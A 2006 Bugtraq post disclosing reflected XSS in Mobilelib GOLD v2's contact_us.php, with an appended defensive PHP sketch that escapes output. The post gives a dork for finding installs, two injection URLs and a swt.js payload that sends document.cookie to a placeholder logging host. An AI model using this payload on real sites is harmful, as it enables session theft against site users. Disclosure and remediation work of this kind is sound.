Message-ID: <20061229200849.10280.qmail@securityfocus.com>
Date: 29 Dec 2006 20:08:49 -0000
From: gamr-14@...mail.com
To: bugtraq@...urityfocus.com
Subject: Re: XSS in script Mobilelib GOLD v2

/////////////////////////////////////
// XSS in script Mobilelib GOLD v2 //
////////////////////////////////////
Found By: viP HaCKEr
Team : AL-GaRNi
Vendor: http://www.ac4p.com
Software: Mobilelib GOLD v2
google : "Powered by ac4p.com"
::::::::::::::::::::::::::::::::::::::
Description:

Line 32 of contact_us.php
:::::::::::::::::::::::::::::::::::::
code:
}
$html=getthemeM("show.tpl");
$html=eregi_replace("{marquee}","$Newnews",$html);
include("block.php");
$errr='';
function chek_mail($email)
{
::::::::::::::::::::::::::::::::::::::
Exploits :

http://[target]/[path]/contact_us.php?email=%20%22%3E%3Cscript%20src%3Dhttp%3A//www.xxxx.com/swt.js%3E%3C/script%3E #

//and

http://[target]/[path]/contact_us.php?errr=%20%22%3E%3Cscript%20src%3Dhttp%3A//www.xxxx.com/swt.js%3E%3C/script%3E #
/****************************************************************//
//Content swt.js
location.href='http://www.yoursite.com/log.php?swt='+escape(document.cookie); #

//End swt.js
############### Group AL-GaRNi ##################
/**********************************************#
/*SwEET-DeViL & viP HaCkEr & HaCkEr sUn *#
/********************************************#
#################(c)@2006####################
########## gamr-14 (at) hotmail (dot) com #############
########## Error-404 (at) msn (dot) com ##########
##########################################
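
Added example, not part of the original post and not Mobilelib code: a defensive sketch of how a contact form can reflect the "email" value and an error message without letting request data become markup. It assumes the values are echoed inside a double-quoted HTML attribute (inferred from the `">` prefix of the posted query strings); the functions h(), request_string() and render_contact_form() are hypothetical names.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: encode for HTML text and quoted attribute values.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hypothetical helper: accept a request parameter only as a bounded string.
function request_string(array $source, string $key, int $maxLen = 254): string
{
    $value = $source[$key] ?? '';
    if (!is_string($value)) {          // rejects array input such as email[]=x
        return '';
    }
    return substr(trim($value), 0, $maxLen);
}

// Hypothetical renderer standing in for the form output of contact_us.php.
function render_contact_form(array $query): string
{
    $email = request_string($query, 'email');
    // The error text is chosen server-side; a request "errr" value is ignored.
    $errr = '';
    if ($email !== '' && filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $errr = 'Invalid e-mail address';
    }
    return '<p class="error">' . h($errr) . "</p>\n"
         . '<input type="text" name="email" value="' . h($email) . '">';
}

// Constructed input: the decoded shape of the query strings in the post.
$sample = [
    'email' => ' "><script src=http://www.xxxx.com/swt.js></script>',
    'errr'  => ' "><script src=http://www.xxxx.com/swt.js></script>',
];
echo render_contact_form($sample), "\n";
```

Marking the session cookie HttpOnly additionally keeps it out of document.cookie, which is what the swt.js shown in the post reads.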
